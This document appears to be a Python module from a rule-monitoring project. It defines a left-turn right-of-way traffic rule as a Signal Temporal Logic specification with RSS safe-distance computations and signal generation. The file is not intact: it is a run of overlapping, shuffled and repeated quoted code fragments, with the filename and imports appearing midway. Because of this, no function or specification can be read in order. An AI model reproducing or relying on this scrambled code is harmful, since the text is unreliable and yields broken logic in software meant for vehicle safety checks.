"self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"]", "in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: #", "release_condition is true *Rewriting*: some operators have been rewritten to match the rtamt", "junction j, other car has no time to brake\" proper response = \"ego", "= 0, because a junction is stationary # then, we just remove the", "(only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition", "out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"]", "\"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in", "{C_react_or_crossed})\" # specification # note: non-strict release operator is written using not and", "release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is", "data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\",", "and release_condition is true *Rewriting*: some operators have been rewritten to match the", "into account 2 possible implementation of the distance metric (only-positive or pos-neg) If", "= data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k:", "2 possible implementation of the distance metric (only-positive or pos-neg) If pos-neg, when", "that they will neither endanger nor substantially impede a road user who has", "import 
Dict, List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule):", "generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\",", "approaching but not occupying the junction j, other car has no time to", "self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num", "is obliged to give way substantially impede a road user who has the", "> d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <=", "ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and", "{} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int)", "*Rewriting*: some operators have been rewritten to match the rtamt spec language (e.g.", "self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den", "in {data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"]", "List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"]", "(the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake", "we just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field] *", "def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input", "return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input", "= \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <=", "f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" 
P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification", "road user who has the right of way when the latter turns into", "language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i", "max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number", "= dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho}", "\"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals}", "substantially impede a road user who has the right of way when the", "they can see that they will neither endanger nor substantially impede a road", "rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc`", "out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"]", "some operators have been rewritten to match the rtamt spec language (e.g. non-strict", "give way substantially impede a road user who has the right of way", "for p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej >", "d_lon_cj in case d has pos-neg interpret. 
A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr", "0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the", "{self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification", "data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] =", "phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the", "self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num =", "a junction is stationary # then, we just remove the `d_f_brake` term from", "v in out_signals.items()} # check output assert all([s in out_signals for s in", "\"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p]", "(release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j)", "import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two", "<= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR", "user who is obliged to give way substantially impede a road user who", "in out_signals.items()} # check output assert all([s in out_signals for s in self.variables]),", "`rho`: reaction time in seconds `rho_dt`: reaction time in number of steps (note:", "from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule", "data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"]", "note: non-strict 
release operator is written using not and until S = f\"(({E_canbrake}", "-> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\",", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k,", "match the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I", "time in number of steps (note: we use `next` operator, we need discrete-time", "out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return", "d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho']", "= data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\")", "(a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0)", "\"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static", "* self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2)", "not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react", "input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in", "to brake\" proper response = \"ego brakes until reach zero-velocity or other car", "# then, we just remove the `d_f_brake` term from the calculation d_b_prebr =", "and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react =", "is 
approaching but not occupying the junction j, other car has no time", "They may only proceed if they can see that they will neither endanger", ":param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal", "road.>> Intuition behind formalization: premise = \"ego is approaching but not occupying the", "plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition)", "\"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\",", "p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\"", "= f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) ->", "phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\",", "implement the Traffic Rule for two cars approaching a junction in opposite directions:", "as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the", "{P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) ->", "max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`:", "\"ego brakes until reach zero-velocity or other car crossed the intersection\" Formalization in", "right of way when the latter turns into the other road.>> Intuition behind", "Dict, List import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\"", "\"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in signals", "premise = \"ego is approaching but not occupying the junction j, other car", "two cars approaching a junction in opposite directions: <<[...] 
They may only proceed", "= (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this", "This rule implement the Traffic Rule for two cars approaching a junction in", "** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den =", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} # check", "d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def", "[\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in", "R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I phi_2", "def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals =", "d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop =", "= np.maximum(d_diff, np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) ->", "car crosses junction, d(car,j)<0 and then release_condition is true (the ego can cross)", "\"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p", "numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement", "= data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] =", "<= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release", "used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\",", "data[\"d_lon_ej\"] 
out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] =", "obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data", "has the right of way. [...] Nor must a road user who is", "d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc)", "self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data:", "reaction time in number of steps (note: we use `next` operator, we need", "<= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" #", "signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) ->", "v_front = 0, because a junction is stationary # then, we just remove", "0) OR (car_can_brake) Note: this condition takes into account 2 possible implementation of", "\"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\",", "condition takes into account 2 possible implementation of the distance metric (only-positive or", "a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0)", "latter turns into the other road.>> Intuition behind formalization: premise = \"ego is", "= not(not(phi_1) Until_i not(phi_2)) - Def. 
Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1", "and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next (not {S})))", "= f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str,", "signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"]", "have been rewritten to match the rtamt spec language (e.g. non-strict release) -", "def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr`", "required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self): #", "reach zero-velocity or other car crossed the intersection\" Formalization in STL: premise =", "# note: the only change is the assumption that v_front = 0, because", "({obs_signals} not in {data.keys()})\" # generate output signals from input signals out_signals =", "list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s in out_signals", "s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate output", "data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end])", "{A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S}", "right of way. [...] 
Nor must a road user who is obliged to", "f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str,", "# generate output signals from input signals out_signals = {} out_signals[\"time\"] = data[\"time\"]", "of steps (note: we use `next` operator, we need discrete-time stl) `max_steps`: overestimation", "= data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] =", "= f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or", "implementation of the distance metric (only-positive or pos-neg) If pos-neg, when car crosses", "self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min =", "A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop}", "Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\",", "[\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\",", "= \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on", "d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr", "str) -> np.ndarray: # note: the only change is the assumption that v_front", "then release_condition is true (the ego can cross) If only-pos, when car crosses", "> d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react", "\"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in 
rss_params", "signals ({obs_signals} not in {data.keys()})\" # generate output signals from input signals out_signals", "({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str,", "= f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property", "to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"]", "who has the right of way when the latter turns into the other", "stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for", "-a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <= 0) OR (car_can_brake)", "in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self):", "from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 *", "Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\",", "<filename>stl_rules/tr_left_turn.py from typing import Dict, List import numpy as np from stl_rules.stl_rule import", "\"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing in signals", "AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake", "{data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] =", "a road user who is obliged to give way substantially impede a road", "crosses junction, d(car,j)<0 and then release_condition is true (the ego can cross) If", "we use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode", "in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake", "f\"({P_react} and {P_brake})\" # 
resulting specification phi_lt_resp = f\"always (({S} and (next (not", "out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p in", "v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} # check output", "C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e", "until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn =", "P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" #", "= f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"always (({S} and (next", "cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is", "static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when", "{out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check", "been rewritten to match the rtamt spec language (e.g. 
non-strict release) - Def.", "return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\"", "or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp = f\"(next", "car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition)", "= d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff))", "def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def", "can see that they will neither endanger nor substantially impede a road user", "(next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej >", "begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\",", "* self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num", "self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den", "self._p = {p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates", "distance metric (only-positive or pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and", "data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"]", "* self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min", "may only proceed if they can see that they will neither endanger nor", "Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0)", "interpret. 
A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond =", "(is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan", "self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v", "f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict", "on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\"", "the only change is the assumption that v_front = 0, because a junction", "is the assumption that v_front = 0, because a junction is stationary #", "junction, d(car,j)<0 and then release_condition is true (the ego can cross) If only-pos,", "discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor open intervals", "in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake", "out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()}", "when the latter turns into the other road.>> Intuition behind formalization: premise =", "# the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc =", "substantially impede a road user who has the right of way. [...] 
Nor", "v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in", "out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for", "no time to brake\" proper response = \"ego brakes until reach zero-velocity or", "> d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop", "= [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for", "breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in seconds", "@property def spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj", "__init__(self, rss_params): \"\"\" :param rss_params: static parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` :", "neither endanger nor substantially impede a road user who has the right of", "if they can see that they will neither endanger nor substantially impede a", "other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake)))", "is stationary # then, we just remove the `d_f_brake` term from the calculation", "[\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param", "operator is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and", "using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\"", "= f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] 
not({release_cond} or {A_lon_e_minbr})))\"", "np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] =", "all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals} not in", "data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] =", "plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego)", "f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def", "car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators", "but not occupying the junction j, other car has no time to brake\"", "pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true (the ego", "calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] *", "- data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"]", "OR (car_can_brake) Note: this condition takes into account 2 possible implementation of the", "all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables} not in", "v_field=\"v_lon_car\") out_signals = {k: list(v[begin:end]) for k, v in out_signals.items()} # check output", "2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] *", "_compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change", 
